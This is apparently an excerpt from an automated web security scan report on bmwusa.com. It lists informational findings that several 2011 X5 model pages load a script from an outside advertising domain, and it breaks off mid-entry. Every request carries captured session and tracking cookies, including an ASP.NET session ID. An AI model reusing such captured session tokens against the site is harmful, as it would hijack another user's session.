Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:42 GMT;path=/
Content-Length: 202224


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.255. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:55 GMT;path=/
Content-Length: 214350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.256. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:24 GMT;path=/
Content-Length: 222920


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.257. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:08 GMT;path=/
Content-Length: 211101


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.258. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35i/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:12 GMT;path=/
Content-Length: 202179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.259. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:47:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:07:46 GMT;path=/
Content-Length: 214639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.260. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:50:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:01 GMT;path=/
Content-Length: 223773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.261. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:49:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:37 GMT;path=/
Content-Length: 211572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.262. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:50:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:10:06 GMT;path=/
Content-Length: 202433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.263. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35ipremium/x5seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:49:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:09:43 GMT;path=/
Content-Length: 202434


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.264. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:51:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:11:44 GMT;path=/
Content-Length: 214810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.265. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:06 GMT;path=/
Content-Length: 224590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.266. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:17 GMT;path=/
Content-Length: 212232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.267. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:20 GMT;path=/
Content-Length: 202463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.268. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive50i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/default.aspx HTTP/1.1
Host: www.bmwusa.com
